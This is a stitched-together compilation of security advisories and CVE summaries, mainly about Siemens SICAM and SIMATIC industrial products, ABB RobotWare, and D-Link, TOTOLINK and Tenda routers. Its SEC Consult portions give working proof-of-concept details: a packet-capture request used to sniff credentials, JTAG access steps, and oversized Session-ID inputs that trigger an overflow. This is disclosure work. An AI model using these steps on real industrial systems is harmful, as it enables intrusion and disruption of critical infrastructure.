en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http:// HOST Connection: close Referer: http:// HOST/ <?xml version="1.0" encoding="UTF-8"?> <Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0"> <value>lo</value> </parameter></view></Cmd_SetCustomViewValue> The attacker can then send the parameter id p0 to the value "lo" and start the packet capture in order to dump from the loopback interface. It is a valid interface, as it only consist of lowercase characters and numbers (fix for CVE-2023-33919). However, the webserver implements TLS in a stunnel fashion. It accepts all TLS traffic on port 443, then decrypts it and forwards it via loopback interface to port 80. By being able to read the loopback traffic, an attacker can now see all communication, including passwords of higher privileged users. 3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486) To demonstrate the issue, the following parameters were set for the MQTT client using the Siemens Toolbox II: * "8 MQTT password" mqtt_pw_sectest * "9 MQTT username" mqtt_sectest The password (together with the username) can be located in the /ies/data/local/system/iescfg.iar file on the device, which can be retrieved by shell access/code execution on the device or by desoldering and reading its unencrypted flash memory chip: ----------------------------------------------------------------------- grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar [...] mqtt mqtt_sectest. mqtt_pw_sectest. < �MQTT_Broker [...] ----------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12 Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92 Vendor contact timeline: ------------------------ 2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3 2023-04-19: Advisory will be handled as case #92461. 2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/ 2023-10-09: Requesting status update 2024-04-03: Requesting status update. 2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024, Siemens advisory scheduled for May 2024 2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2 2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2 2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3 2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1 2024-06-26: Public release of advisory Solution: --------- The vendor provides a patch which can be downloaded at the following URLs depending on the affected device: CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41 https://support.industry.siemens.com/cs/ww/en/view/109812178/ CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109818240/ OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/ CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/ Additional information from the vendor can be found in their advisories: https://cert-portal.siemens.com/productcert/html/ssa-871704.html https://cert-portal.siemens.com/productcert/html/ssa-620338.html Workaround: ----------- Limit network and physical access to the PLC. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024 . The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device. Vulnerability overview/description: ----------------------------------- 1) Unlocked JTAG Interface of Zynq-7000 on SM-2558 The JTAG interface can be accessed with physical access to the PCB. After slightly modifying the hardware it is possible to connect to the interface with full access to the communication module. The target buffer is in the BSS segment and likely 1024 bytes in length. The buffer overflows into several other global data structures. Proof of concept: ----------------- 1) Unlocked JTAG Interface of Zynq-7000 on SM-2558 The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated 20-pin header on the PCB (see [figure_1]). A removed connection needs to be restored by soldering an additional wire between two exposed contacts (see [figure_2]), as the JTAG interface of the Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet controller. After connecting to the pins, a connection to the Zynq-7000 JTAG interface is possible. E.g., memory can be dumped ([figure_5]), execution can be single stepped ([figure_4]) or halted ([figure_3]), and variables changed. This grants an attacker with physical access full control of the communication module. (in total 618 characters) results in three HTTP responses HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA992 Sequence-ID: 1 Content-Type: text/plain Content-Length: 8 type=4 d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in a HTTP 500 - internal server error HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 198 <html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html> Pseudocode of vulnerable function: [...] sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); <<<<<<<<<<<<<<<< session_id is extracted from HTTP request if ( !sessiond_id ) goto LABEL_194; if ( unk_51CD1C ) { v11 = 0; } else { sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u); v11 = 1; } if ( sub_15332C() == 1 ) { v134 = 0; if ( sub_155BC4(a1, (int)v133) || !v134 ) { LABEL_49: sequence_id = get_http_header_int(a1, "Sequence-ID"); sprintf( <<<<<<<<<<<<<<<< response_buffer overflows here response_buffer, "HTTP/1.1 200 OK\r\n" "Server: %s\r\n" "Version: %u\r\n" "Session-ID: %s\r\n" "Sequence-ID: %lu\r\n" "Content-Type: text/plain\r\n" "Content-Length: 0\r\n" "\r\n", "SICAM 1703", 1, sessiond_id, sequence_id); [...] Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: - Webserver that runs on Firmware Version 10A45 of the Zynq FPGA. - The Hardware revision of the device was unknown. 2024-04-03: Siemens can reproduce vulnerabilities and will evaluate buffer overflow. Hardware is EOL, no fix for the JTAG issue. 2024-06-11: Siemens publishes SSA-620338 and confirms the buffer overflow. 2024-07 - 2024-09: Various vacation / absences, delaying advisory coordination. 2024-10-22: Meeting with ProductCERT, discussing release of SM-2558 advisory. 2024-10-31: Sending advisory draft to ProductCERT. 2024-11-14: Receiving feedback on advisory draft. 2024-11-19: Sending updated advisory to ProductCERT. 2024-11-25: Coordinated release of advisory. Solution: --------- The vendor provides patches for the affected devices / components to fix CVE-2024-31484: * ETA4 for SM-2558: Upgrade to V10.46 * ETA5 for SM-2558: Upgrade to V03.27 * CPCX26 for CP-2016: Upgrade to V06.02 * PCCX26 for CP-2019: Upgrade to V06.05 More detailed information can be found in the Siemens Security Advisory SSA-620338: https://cert-portal.siemens.com/productcert/html/ssa-620338.html The hardware (SM-2558) is considered end of life (EOL), thus no new version with a fixed JTAG will be released. Restrict physical access to the device

A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). Affected systems transmit client-side resources without proper cryptographic protection. This could allow an attacker to eavesdrop on and modify resources in transit. A successful exploit requires an attacker to be in the network path between the RTLS Locating Manager server and a client (MitM). SIMATIC RTLS Locating Manager is used to configure, operate, and maintain SIMATIC RTLS devices, which are real-time wireless location systems that provide location solutions. Siemens SIMATIC RTLS Locating Manager has a sensitive information plaintext transmission vulnerability

A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The "DBTest" tool of SIMATIC RTLS Locating Manager does not properly enforce access restriction. This could allow an authenticated local attacker to extract sensitive information from memory. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless positioning system that provides positioning solutions. Siemens SIMATIC RTLS Locating Manager has a critical resource permission allocation incorrect vulnerability

A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). The affected systems use symmetric cryptography with a hard-coded key to protect the communication between client and server. This could allow an unauthenticated remote attacker to compromise confidentiality and integrity of the communication and, subsequently, availability of the system. A successful exploit requires the attacker to gain knowledge of the hard-coded key and to be able to intercept the communication between client and server on the network. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless location system that provides location solutions

A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions < V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions < V3.0.1.1). Affected SIMATIC RTLS Locating Manager Clients do not properly check the integrity of update files. This could allow an unauthenticated remote attacker to alter update files in transit and trick an authorized user into installing malicious code. A successful exploit requires the attacker to be able to modify the communication between server and client on the network. SIMATIC RTLS Locating Manager is used to configure, operate and maintain SIMATIC RTLS devices, which is a real-time wireless location system that provides location solutions

An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible. The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system. Below are reported vulnerabilities in the Robot Ware versions. * IRC5- RobotWare 6 < 6.15.06 except 6.10.10, and 6.13.07 * OmniCore- RobotWare 7 < 7.14

An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible, or execute arbitrary code.   The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system. Below are reported vulnerabilities in the Robot Ware versions. * IRC5- RobotWare 6 < 6.15.06 except 6.10.10, and 6.13.07 * OmniCore- RobotWare 7 < 7.14 . ABB of Robotware Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A vulnerability has been identified in Security Configuration Tool (SCT) (All versions), SIMATIC Automation Tool (All versions < V5.0 SP2), SIMATIC BATCH V9.1 (All versions < V9.1 SP2 Upd5), SIMATIC NET PC Software V16 (All versions < V16 Update 8), SIMATIC NET PC Software V17 (All versions), SIMATIC NET PC Software V18 (All versions < V18 SP1), SIMATIC NET PC Software V19 (All versions < V19 Update 2), SIMATIC PCS 7 V9.1 (All versions < V9.1 SP2 UC05), SIMATIC PDM V9.2 (All versions < V9.2 SP2 Upd3), SIMATIC Route Control V9.1 (All versions < V9.1 SP2 Upd3), SIMATIC S7-PCT (All versions < V3.5 SP3 Update 6), SIMATIC STEP 7 V5 (All versions < V5.7 SP3), SIMATIC WinCC OA V3.17 (All versions), SIMATIC WinCC OA V3.18 (All versions < V3.18 P025), SIMATIC WinCC OA V3.19 (All versions < V3.19 P010), SIMATIC WinCC Runtime Advanced (All versions < V17 Update 8), SIMATIC WinCC Runtime Professional V16 (All versions < V16 Update 6), SIMATIC WinCC Runtime Professional V17 (All versions < V17 Update 8), SIMATIC WinCC Runtime Professional V18 (All versions < V18 Update 4), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 2), SIMATIC WinCC V7.4 (All versions), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 17), SIMATIC WinCC V8.0 (All versions < V8.0 Update 5), SINAMICS Startdrive (All versions < V19 SP1), SINEC NMS (All versions < V3.0), SINEC NMS (All versions < V3.0 SP1), SINUMERIK ONE virtual (All versions < V6.23), SINUMERIK PLC Programming Tool (All versions < V3.3.12), TIA Portal Cloud Connector (All versions < V2.0), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions < V17 Update 8), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 4), Totally Integrated Automation Portal (TIA Portal) V19 (All versions < V19 Update 2). The affected applications contain an out of bounds read vulnerability. This could allow an attacker to cause a Blue Screen of Death (BSOD) crash of the underlying Windows kernel. S7 PCT (Port Configuration Tool) is a PC-based software for parameterizing Siemens IO-Link master modules and third-party IO-Link devices. Security Configuration Tool (SCT) is an engineering software for safety devices such as SCALANCE-S or CP 443-1Advanced. SIMATIC Automation Tool allows commissioning, adjustment and service in combination with S7-1200 and S7-1500 controllers without an engineering framework. SIMATIC NET PC software is a separately sold software product for implementing communication products for SIMATIC.NET. SIMATIC PCS 7 is a distributed control system (DCS) that integrates SIMATIC WinCC, SIMATIC Batch, SIMATIC Route control, OpenPCS 7 and other components. SIMATIC PDM (Process Device Manager) is a universal, manufacturer-independent tool for configuration, parameter assignment, commissioning, diagnostics and maintenance of intelligent process devices (actuators, sensors) and automation components (remote I/O, multiplexers, process control units, compact controllers). SIMATIC STEP 7 V5 is the classic engineering software for configuring and programming SIMATIC S7-300/S7-400/C7/WinAC controllers. SIMATIC WinCC is a Supervisory Control and Data Acquisition (SCADA) system. SIMATIC WinCC Open Architecture (OA) is part of the SIMATIC HMI family. It is designed for applications that require a high degree of customer-specific adaptability, large or complex applications, and projects that impose specific system requirements or functions. SIMATIC WinCC Runtime Advanced is a visualization runtime platform for operator control and monitoring of machines and plants. SIMATIC WinCC Runtime Professional is a visualization runtime platform for operator control and monitoring of machines and plants. SIMATIC WinCC Unified PC Runtime is a new visualization runtime platform for operator control and monitoring of machines and plants. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in the TIA Portal. SINUMERIK CNC provides automation solutions for workshops, shop floors and large serial production environments. SINUMERIK ONE is a digital native CNC system. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the complete range of Siemens digital automation services, from digital planning and integrated engineering to transparent operation. TIA Portal Cloud Connector enables access to local PG/PC interfaces and connected SIMATIC hardware from TIA Portal Engineering when engineering via remote desktop on a private cloud server

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230922. This issue affects some unknown processing of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-263747. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link Systems, Inc. of dar-8000-10 An untrusted data deserialization vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. DAR-8000-10 is an Internet behavior audit gateway of D-Link Corporation of China. DAR-8000-10 20230922 and earlier versions of D-Link Electronics (Shanghai) Co., Ltd. have a deserialization vulnerability. The vulnerability stems from the unsafe deserialization processing of the parameter sql of the file /importhtml.php when receiving the serialized data submitted by the user. Attackers can exploit this vulnerability to cause code execution

TOTOLINK LR350 V9.3.5u.6698_B20230810 was discovered to contain a stack overflow via the password parameter in the function loginAuth. TOTOLINK of lr350 Firmware has a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The TOTOLINK LR350 is a 4G LTE router released by China's TOTOLINK Electronics. It converts 4G signals into wired signals and is suitable for home and office use. The TOTOLINK LR350 suffers from a buffer overflow vulnerability. This vulnerability stems from the failure to properly validate the length of the input data in the password parameter of the loginAuth function. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service

Tenda AC18 v15.03.05.19 is vulnerable to Buffer Overflow in the formSetPPTPServer function via the endIp parameter. Shenzhen Tenda Technology Co.,Ltd. of AC18 An out-of-bounds read vulnerability exists in firmware.Information is tampered with and service operation is interrupted (DoS) It may be in a state. The vulnerability is caused by the endIp parameter in the formSetPPTPServer function failing to correctly verify the length of the input data. Attackers can exploit this vulnerability to cause a denial of service

Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/DhcpListClient. Shenzhen Tenda Technology Co.,Ltd. Attackers can exploit this vulnerability to cause a denial of service

Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPW parameter at ip/goform/WizardHandle. Shenzhen Tenda Technology Co.,Ltd. of fh1206 Firmware has a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The vulnerability is caused by the PPW parameter of ip/goform/WizardHandle failing to correctly verify the length of the input data. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service